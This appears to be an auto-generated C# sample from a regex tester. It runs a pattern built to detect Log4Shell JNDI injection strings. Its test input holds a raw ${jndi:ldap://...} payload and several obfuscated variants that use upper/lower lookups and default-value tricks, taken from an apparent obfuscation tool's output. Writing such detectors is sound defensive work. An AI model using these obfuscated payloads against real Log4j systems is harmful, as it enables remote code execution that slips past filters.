using System;
using System.Text.RegularExpressions;
public class Example
{
public static void Main()
{
string pattern = @"\${(\${(.*?:|.*?:.*?:-)('|""|`)*(?1)}*|[jndi:lapsrm]('|""|`)*}*){9,11}";
string input = @"[>] jndi inject model start...
[+] Raw payload:
${jndi:ldap://127.0.0.1:1099/obj}
[+] {[upper|lower]:x} Random obfuscate:
${${upper:j}ndi:ldap${lower::}//127${lower:.}${lower:0}.0.1${lower::}1${lower:0}9${lower:9}/ob${lower:j}}
[+] {[upper|lower]:x} all the obfuscate:
${${upper:j}${lower:n}${lower:d}${lower:i}${lower::}${lower:l}${lower:d}${lower:a}${lower:p}${lower::}${lower:/}${lower:/}${lower:1}${lower:2}${lower:7}${lower:.}${lower:0}${lower:.}${lower:0}${lower:.}${lower:1}${lower::}${lower:1}${lower:0}${lower:9}${lower:9}${lower:/}${lower:o}${lower:b}${lower:j}}
[+] {::-n} random obfuscate:
${jn${zwbIes:o:Bmmy:YGM:IoEt:-d}${nNJ:bP:LLecz:-i}${V:aTCz:SMYnf:nVwz:iWrhM:-:}l${IkcQG:KqY:DNlC:blYP:-d}${dMnno:LY:lm:o:gfceFK:-a}${YRLF:-p}${oPWM:tEf:Nm:B:gtF:-:}${Kw:-/}/12${oyBx:-7}.${fGURHq:jUkxp:LiRat:TFGT:-0}${RsEN:-.}${gqxRsv:-0}.${DP:A:zc:Bxk:-1}${Fgp:xnDqO:ymI:Ei:OiGvf:-:}109${BNuY:RNph:VQ:-9}${OEB:mqId:ShLsGJ:WGCQ:-/}o${JQ:ipL:PkyY:-b}j}
[+] {::-n} all the obfuscate:
${${w:Diwn:-j}${nefD:Xih:oCs:l:-n}${cFCwSi:AA:tOqrpE:-d}${fC:ap:uQ:jOT:Dw:-i}${lMK:HQnIQ:Tdn:MzzGN:-:}${dumM:-l}${d:wSdIa:Ot:-d}${XB:oktyjp:QTCl:-a}${KbVE:YOA:qRaof:z:nwv:-p}${XFMG:B:uz:gb:-:}${pBmmGn:waCidF:TXkIzf:-/}${bnb:Qi:vhQi:-/}${spw:t:Lgo:fmcGv:-1}${PvEYM:T:FpFw:c:C:-2}${Tzd:Sn:WXeQ:-7}${cg:xw:qoJuX:NVjaam:-.}${P:vkp:MP:YgX:DoHSm:-0}${jAO:i:zlpnK:aeGVI:YFHd:-.}${jDvpmy:xc:-0}${g:XCXx:yQImF:-.}${QQ:GYcUYC:-1}${CON:XEI:EcX:REGEIc:-:}${ipIDmp:jVt:-1}${LHjMhu:liwEPU:qFQRj:PL:-0}${nUfCc:TKhXP:Slx:IY:-9}${cbEh:vz:Szv:-9}${eFAO:F:-/}${fqUl:EElTW:Jbm:e:WOJDWw:-o}${CewNm:arlr:-b}${DULc:DFbNv:JMEG:i:-j}}
[=] jndi inject model stop
";
RegexOptions options = RegexOptions.Multiline;
foreach (Match m in Regex.Matches(input, pattern, options))
{
Console.WriteLine("'{0}' found at index {1}.", m.Value, m.Index);
}
}
}
Please keep in mind that these code samples are automatically generated and are not guaranteed to work. If you find any syntax errors, feel free to submit a bug report. For a full regex reference for C#, please visit: https://msdn.microsoft.com/en-us/library/system.text.regularexpressions.regex(v=vs.110).aspx